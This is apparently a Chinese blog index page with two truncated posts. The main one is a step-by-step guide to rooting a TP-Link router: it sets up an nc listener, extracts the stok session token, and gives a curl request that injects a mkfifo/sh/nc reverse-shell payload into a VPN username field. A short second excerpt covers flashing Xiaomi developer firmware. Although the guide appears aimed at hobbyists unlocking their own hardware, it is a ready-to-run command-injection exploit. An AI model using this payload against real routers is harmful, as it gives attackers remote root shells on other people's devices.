shell 注入方法来源：https://forum.openwrt.org/t/adding-support-for-tp-link-xdr-6086/140637/17

准备工作

1.先登录路由器 Web 界面，在 VPN 设置里添加一个 L2TP-服务端，再随便添加一个用户（如果不想手填用户信息，也可以使用后面提供的 curl 命令来创建用户）。
2.使用 nc 监听本地端口，比如 2000, Windows 可以安装 nmap，然后使用 nmap 带的 ncat 命令（在 nmap 安装目录）

nc -lp 2000

或（Windows 系统最好临时关闭一下防火墙）

ncat -lp 2000

获取 stok

按 F12 打开浏览器调试控制台，找到形如 http://192.168.0.1/stok=xxxx/ds 的 URL，chrome 浏览器的话，在“网络”标签页找到“名称”是 “ds” 的请求，单击它，然后在右侧窗口单击“标头”就可以看到了。

反弹 shell

反弹 shell 是通过在 VPN 用户名里注入 shell 命令，并且在禁用用户的时候执行，所以需要先启用用户（新建用户默认是启用的）。

创建用户（如果没用在界面创建的话）

注意把 json 里的 192.168.0.100 替换成你自己的 IP（即执行 nc/ncat -lp 2000 的机器的 IP，如果不想改 json 中的 IP，也可以改机器的 IP ）。

curl http://192.168.0.1/stok=xxxx/ds -H "Content-Type: application/json" -X POST -d '{"vpn":{"table":"user","name":"user_1","para":{"username":";mkfifo /tmp/p;sh -i</tmp/p 2>&1|nc 192.168.0.100 2000 >/tmp/p&","password":"password","type":"l2tp","localip":"192.168.1.1","ippool":"ippool","dns":"1.1.1.1","netmode":"client2lan","maxsessions":"10","remotesubnet":"192.168.1.0/24","block":"0"}},"method":"add"}'

执行成功的话，返回如下：

{"error_code":0}

- 阅读剩余部分 -

1.下载安装开发版固件

官网下载: http://www.miwifi.com/miwifi_download.html
下载地址: miwifi_ra70_all_develop_1.0.140.bin
md5sum: a0221ec10e2197922c975bc5cf961324
sha256sum: 4471d3d9d1e047429e3baf7abc06e79f2ff949af570d9d0c2c39aea018252b66

直接在界面更新即可。

- 阅读剩余部分 -